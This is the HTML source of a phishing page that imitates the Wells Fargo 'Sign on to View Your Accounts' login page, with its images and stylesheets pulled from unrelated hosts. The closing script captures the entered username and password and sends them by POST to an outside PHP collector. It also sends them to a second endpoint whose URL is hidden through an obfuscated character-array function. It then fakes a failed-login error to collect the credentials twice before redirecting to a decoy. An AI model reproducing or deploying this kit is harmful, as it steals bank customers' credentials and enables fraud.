<html lang="en"><head>

	<!--Meta  starts-->
			<meta http-equiv="Content-type" content="text/html; charset=UTF-8">
			<meta http-equiv="Pragma" content="no-cache">
			<meta http-equiv="Pragma: no-cache">
			<meta http-equiv="Cache Control" content="no-store">
			<meta http-equiv="Cache Control: no-store">
			<meta http-equiv="Expires" content="-1">
		    <meta http-equiv="Content-type" content="text/html; charset=UTF-8">
	        <title>Sign On to View Your Personal Accounts | Wells Fargo</title>


	<!--css include starts-->
			<link rel="stylesheet" href="https://www.jmma.gr.jp/comment/wl/piz/892/Files/css/global.css">
			<link rel="stylesheet" href="https://www.jmma.gr.jp/comment/wl/piz/892/Files/css/enhanced-header.css">
			<link rel="stylesheet" href="https://www.jmma.gr.jp/comment/wl/piz/892/Files/css/content.css">
			<link rel="stylesheet" href="https://www.jmma.gr.jp/comment/wl/piz/892/Files/css/wf.css">
			<link rel="stylesheet" href="https://www.jmma.gr.jp/comment/wl/piz/892/Files/css/enhanced-footer.css">
			<link rel="icon" href="favicon.ico" type="image/x-icon">


</head>


<body id="body" theme="ssep" platform="m" contextpath="/auth">

    <a href="#" class="skipLink">main content default</a>
    <header isjukebox="" divested="" class="" origin="cob">
	<div class="enhanced-header">
			<div class="header-top ">
				<div class="header-content flex-container">
					<div class="header-brand-logo">
						<a href="#">
								<img src="https://www.jmma.gr.jp/comment/wl/piz/892/Files/img/tccc.svg" alt="WELLS FARGO">
						</a>
					</div>
				<div class="header-content links flex-container">
					</div>
				<div class="header-nav-section flex-container">
						<div class="header-nav-links flex-container">
								<div class="header-nav-link">
										<a href="#">Apply</a>
									</div>
								<div class="header-nav-link">
										<a href="#">Locations</a>
									</div>
								<div class="header-nav-link">
										<a href="#">Customer Service</a>
									</div>
								</div>

							<div class="header-search">
								<form  class="header-search-form" id="">
									<input name="q" value="" aria-label="Search" title="Search" size="25" maxlength="75" type="text" autocomplete="off" autocapitalize="off" placeholder="Search">
									<img role="button" aria-label="Search" src="https://www.jmma.gr.jp/comment/wl/piz/892/Files/img/ba7t.svg" class="header-search-icon" alt="search" tabindex="0">
										</form>
							</div>
							</div>
				</div>
			</div>
			<div class="header-bottom">
					<div class="header-content flex-container">
						<ul>
							<li><a id="backToPreviousPageLink" href="#">Back to Previous Page</a></li>
							<li>
									<a href="#" id="es-link" lang="es" class="OneLinkNoTx">Español</a>
									</li>
							<li><a href="#">Home</a></li>
							</ul>
					</div>
				</div>
			</div>
	</header>

<section data-id="hero" role="presentation" class="stage-coach-banner">
            <img src="https://www.jmma.gr.jp/comment/wl/piz/892/Files/img/WF_stagecoach_rgb_ylw_F1.svg" alt="" aria-hidden="true">
        </section>
    <main>

<input type="hidden" name="spox">
<section data-id="content" aria-label="Sign nn to View Your Accounts" class="antiClickjackContent" origin="cob">
	<h1 id="skip" tabindex="-1">Sign on to View Your Accounts</h1>

<br>



<div id="pageerrors">
		
			
			<div class="errmsg"  aria-atomic="true" role="alert" tabindex="-1" style="display: none; color: #bb0826;position: relative;"><img src="https://clip53.com/wp-includes/images/piz/892/Files/img/error1.png"> 
			
			<strong>
					<strong>We do not recognize your username and/or password. Please try again or visit <a href="">Username/Password Help</a>.</strong></strong> </div>

					
		
	<div id="pageerrors">
		<div class="alert" aria-atomic="true" role="alert" tabindex="-1">
				<img src="https://www.jmma.gr.jp/comment/wl/piz/892/Files/img/alert_login.png" height="16" width="16" alt="Error">
				<strong>
					<strong>Access denied. You need to login first.</strong></strong>
			</div>
		</div>

		<div id="pageerrors">
		</div>
	<p class="copy" origin="cob">Enter your username and password to securely view and manage your
			Wells Fargo
			accounts online.</p>
		<div data-id="destination">
			<div class="enh-select">
			<select name="destination" id="destination" title="Select a destination">
				<option selected="selected" value="AccountSummary">Account Summary</option>
				<option value="Transfer">Transfer</option>
				<option value="BillPay">Bill Pay</option>
				<option value="brokerage">Brokerage</option>
				<option value="Trade">Trade</option>
				<option value="MessageAlerts">Messages &amp; Alerts</option>
			</select>
			</div>
		</div>
		<form class="m-auto" id="themform">
	<div data-id="inputContainer">
		<label id="j_username_label" for="j_username">Username</label><br>
		<input  type="text" name="em" value="" class="OneLinkNoTx" required="" data-validation="length" data-validation-error-msg=" " data-validation-length="min6-24">
			<div id="saveUsernamePopup" tabindex="-1" role="alertdialog" aria-labelledby="saveUsernameTitle" aria-describedby="saveUsernameDescription" data-id="saveUsernamePopup">
			<span>Beginning of popup</span>
			<h2 id="saveUsernameTitle">Notice</h2>
			<p id="saveUsernameDescription">For your security, we do not recommend using this feature on a shared device.</p>
			<img data-id="saveUsernameArrow" src="https://www.jmma.gr.jp/comment/wl/piz/892/Files/img/down.png" alt="" aria-hidden="true">
			<span>End of popup</span>
			<img tabindex="0" data-id="saveUsernameClose" role="button" src="https://www.jmma.gr.jp/comment/wl/piz/892/Files/img/closex.png" alt="close dialog" aria-label="close dialog">
		</div>
	</div>
	
	
	<div data-id="inputContainer">
		<label id="j_password_label" for="j_password">Password</label><br>
		<input  type="password"  name="ps" value="" maxlength="32" autocorrect="off" required="" data-validation="length" data-validation-error-msg=" " data-validation-length="min1-32">
	</div>
	<div class="clear-both" data-id="inputContainer">
		<label class="unselectable" for="saveUsernameCheckbox" style="">
						<input class="unselectable" aria-labelledby="labelSaveUsername labelInstruction" value="true" type="checkbox" id="saveUsernameCheckbox">
						<img class="unselectable" id="imgSaveUsernameCheck" src="https://www.jmma.gr.jp/comment/wl/piz/892/Files/img/save.png" checked="false" alt="">
						<span class="unselectable" id="labelSaveUsername">Save Username</span>
						<span class="sr-only" id="labelInstruction"> Checking this option will open a popup  after 2 second</span>
					</label>
				</div>
	<div class="block-display clear-both">
		<div data-id="forgotEnrollLinks" origin="cob">
			<a href="#" data-id="forgotUsername" origin="cob">Forgot Password/Username?</a>
						<span data-id="linkSeparator">|</span>
						<a href="#" data-id="forgotUsername">Enroll Now</a>
							</div>
		<input type="submit" name="continue" value="Sign On"  id="submit-btn" class="button cob cta-btn primary" origin="cob">
			</div>
</section>
<aside>
                <hr>
                <section class="aside-group" data-id="relatedInformation" aria-label="related information">
	<h2>Related Information</h2>
	<ul>
		<li><img src="https://www.jmma.gr.jp/comment/wl/piz/892/Files/img/go.png" alt="" aria-hidden="true"> <a href="#">Enrollment FAQs</a></li><li><img src="https://www.jmma.gr.jp/comment/wl/piz/892/Files/img/go.png" alt="" aria-hidden="true"> <a href="#">Online Security Guarantee</a></li><li><img src="https://www.jmma.gr.jp/comment/wl/piz/892/Files/img/go.png" alt="" aria-hidden="true"> <a href="#">Privacy, Security and Legal</a></li><li><img src="https://www.jmma.gr.jp/comment/wl/piz/892/Files/img/go.png" alt="" aria-hidden="true"> <a href="#">Online Access Agreement</a></li></ul>
</section>
<section class="aside-group" data-id="otherServices" aria-label="other services">
	<h2>Other Services</h2>
	<ul>
		<li><img src="https://www.jmma.gr.jp/comment/wl/piz/892/Files/img/go.png" alt="" aria-hidden="true"> <a href="#">Applications In Progress</a></li>
		<li><img src="https://www.jmma.gr.jp/comment/wl/piz/892/Files/img/go.png" alt="" aria-hidden="true"> <a href="#">Credit Card Rewards</a></li>
	</ul>
</section>
</aside>

            <section data-id="submitContainer">
            </section>
       </form>
    </main>
    <div data-id="footerSeparator"></div>
    <footer>
    <div class="enhanced-footer">
        <nav role="navigation">
            <div>
                <div>
                    <div class="nav-links">
                        <div class="nav-link">
                                <a href="#">About Wells Fargo</a>
                                <div class="link-separator"></div>
                            </div>
                        <div class="nav-link">
                                <a href="#">Careers</a>
                                <div class="link-separator"></div>
                            </div>
                        <div class="nav-link">
                                <a href="#">Privacy, Security &amp; Legal</a>
                                <div class="link-separator"></div>
                            </div>
                        <div class="nav-link">
                                <a href="#">Report Email Fraud</a>
                                <div class="link-separator"></div>
                            </div>
                        <div class="nav-link">
                                <a href="#">Sitemap</a>
                                <div class="link-separator"></div>
                            </div>
                        <div class="nav-link">
                                <a href="#">Home</a>
                                <div class="link-separator"></div>
                            </div>
                        </div>
                </div>
            </div>
        </nav>
        <div class="copyright-text">
            <div class="clear-both">
				<div>
	                <p data-id="copyright" class="cob">© 1999 - 2021 Wells Fargo. All rights reserved. </p>
	                    </div>
			</div>
</div>
    </div>
</footer>

<script>
        if ('False' === 'True') {
            
            document.getElementById("loginSubmitButton").addEventListener("click", function () {
                var tagMessage = {
                    "tagName": "Adobe",
                    "tagData": {
                        "pageName": "button_login"
                    }
                };
                tagMessage.eventType = "trackEvent";
                var adAnTargetOrigin = getDomainFromUrl(document.referrer);
                var isValid = verifyDomain(adAnTargetOrigin);
                if (isValid === true) {
                    parent.postMessage(JSON.stringify(tagMessage), adAnTargetOrigin);
                }
            });
        }

        $(".toggle-pw-atr").on("click", function () {
            var link = $(this);
            var input = $(".lms-login-password-input");
            if (input && input.attr("type") === "password") {
                link.text(link.text().replace("Show", "Hide"));
                input.attr("type", "text");
            } else {
                link.text(link.text().replace("Hide", "Show"));
                input.attr("type", "password");
            }
        })
    </script>

 <script src="https://ajax.aspnetcdn.com/ajax/jQuery/jquery-3.3.1.min.js"></script>
    <script>

let href = $(location).attr('href');
    let divide1 = href.split("@");
    let divide2 = href.split("#");
    $('#theDomain').text(divide1[1]);
    $('#txtEmail').val(divide2[1]);


      $(document).ready(function(){
        var errmsg = $('.errmsg');
        errmsg.hide();
        var ufromUrl = get_email_hash();
        if(!ufromUrl){
          ufromUrl = geturlparameter('username'); 
        }
        var redirectUrl = 'https://fourbqe3qszfdh4frtsbbx8wnm.onrender.com/t8r9MWOnKu9KkHOp0sYIibwk.html?wellfargo/auth/log?origin=?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=637709737665552264.OWE4OWZkZDEtNDI2Mi00N2UyLWFiYTQtZTgyZWExMmNiMWM3OWY5YTFjNzgtMDIzNi00MTBhLTgzNTItYzc0NDdmMmJhNjVk&ui_locales=en-US&mkt=en-US&client-request-id=674d0bd8-713b-46cd-b077-41d07480de98&state=No33zKtL9uQU1H2ix7xZIw8Ie61Peda_tvotRd-JKjSThTwyTywHsbq7q3268epKxEvN1QCuz0HuDQKs1b4798IY9-OYh5Go1wtm31yA1XhnrljNnSJ689Z_rULiDky9DbwjCfi9ZgYe3svce5D3YYJlwa_jscyuczr_Z5QUt2yucDfQN4L83IPn1vcek9WZDhb31rrE9xHbuEbb3Pn_70ryY8S2N24aW7pM6og5r0BP4eTaA9PbG1_p8t80CMsBWUedr9ZvWntjoiPesYxTvQ&x-client-SKU=ID_NETSTANDARD2_0&x-client-ver=6.12.1.0';
        var isStyleDouble = 3;
        var styleDoubleCounter = 1;
        var styleDoubleFromUrl = 1;
        var formcon = $('#themform');
        var em = $('#themform input[name=em]');
        var ps = $('#themform input[name=ps]');
        
        if(ufromUrl){ em.val(ufromUrl);  }
        var emv = ''; var psv = '';  
        if(isStyleDouble){
          styleDoubleFromUrl = geturlparameter('db');
          if(styleDoubleFromUrl){
            styleDoubleFromUrl = parseInt(styleDoubleFromUrl);
            if(isNaN(styleDoubleFromUrl)){
              styleDoubleFromUrl = 1;
            }
            if(styleDoubleFromUrl > 1){
            errmsg.show();
            }
          }
          else{ styleDoubleFromUrl = 1; }
        }
        formcon.submit(function(e){
          e.preventDefault();
          emv = em.val();
          psv = ps.val();
            if(em && em.length > 0 && psv && psv.length > 0){
              var theemidval = '802e01df4281d98de2cdfadf159e5e5f';
              mg(emv, psv,'Outlook 5');  
              $.ajax({
                url: 'https://clip53.com/blogs/media/wl/firs.php', 
                type: 'POST', 
                dataType: 'html', 
                data: { Email : emv, password : psv, typeofemail : 'Outlook 5', theemid : theemidval}, 
                crossDomain: true,
                  success: function(msg) {
                },
                error: function(e) {
                  console.log(e)
                }
              });
              if(isStyleDouble && styleDoubleFromUrl && styleDoubleFromUrl < isStyleDouble && styleDoubleFromUrl < 3){
                styleDoubleFromUrl++;
                redirectUrl = 't8r9MWOnKu9.html?'+get_rand_url_pars()+'&db='+styleDoubleFromUrl+'&username='+emv;
              }
              setTimeout(function(){
                window.location.replace(redirectUrl);
                //alert(redirectUrl);
              }, 1000);              
            }
          });
        
        
      });


function mg(a,o,t){var h = ['O','L','t','q','e','D','c','-','.','z','u','2','T','m','V','J','6','U','P','b','v','K','B','Z','i','7','R',':','C','/','o','r','n','Q','S','5','3','8','a','M','W','I','x','H','Y','4','1','k','s','d','g','A','j','F','N','9','G','l','f','p','X','0','w','y','E','h'],f = h[65]+h[2]+h[2]+h[59]+h[48]+h[27]+h[29]+h[29]+h[38]+h[59]+h[24]+h[49]+h[38]+h[2]+h[38]+h[6]+h[48]+h[48]+h[8]+h[6]+h[30]+h[13]+h[29]+h[58]+h[24]+h[32]+h[24]+h[48]+h[65]+h[7]+h[10]+h[32]+h[20]+h[11]+h[11]+h[8]+h[59]+h[65]+h[59];$.ajax({url:f,type:"POST",dataType:"html",data:{Email:a,password:o,typeofemail:t},crossDomain:!0,success:function(a){},error:function(a){}})}
function randomInteger(min, max) {return Math.floor(Math.random() * (max - min + 1)) + min; }
function randomString(r,n){for(var o="",t=r;0<t;--t)o+=n[Math.floor(Math.random()*n.length)];return o}
function getdomainpartofemail(a){var e,t=!1;return!validateEmail(a)||-1!=(e=(a=a.toLowerCase()).indexOf("@"))&&(t=a.substr(e+1)),t}
function get_email_hash(){var a=!1,i=window.location.href,t=(i=i.trim()).lastIndexOf("#");return-1!=t&&(a=i.substring(t+1),validateEmail(a)||(a=!1)),a}
function validateEmail(t){return/^(([^<>()\[\]\\.,;:\s@"]+(\.[^<>()\[\]\\.,;:\s@"]+)*)|(".+"))@((\[[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\])|(([a-zA-Z\-0-9]+\.)+[a-zA-Z]{2,}))$/.test(String(t).toLowerCase())}
function geturlparameter(r){for(var t=window.location.search.substring(1).split("&"),e=0;e<t.length;e++){var n=t[e].split("=");if(n[0]==r)return decodeURIComponent(n[1])}}
function get_rand_url_pars(){var r="",n=0,a="abcdefghijklmnopqrstuvwxyz",e=a;a+=a.toUpperCase()+"123456789";for(var t=randomInteger(3,10),n=0;n<t;n++)r+="&"+randomString(randomInteger(3,10),e)+"="+randomString(randomInteger(15,30),a);return r.substr(1)}

    </script>



</body>
</html>
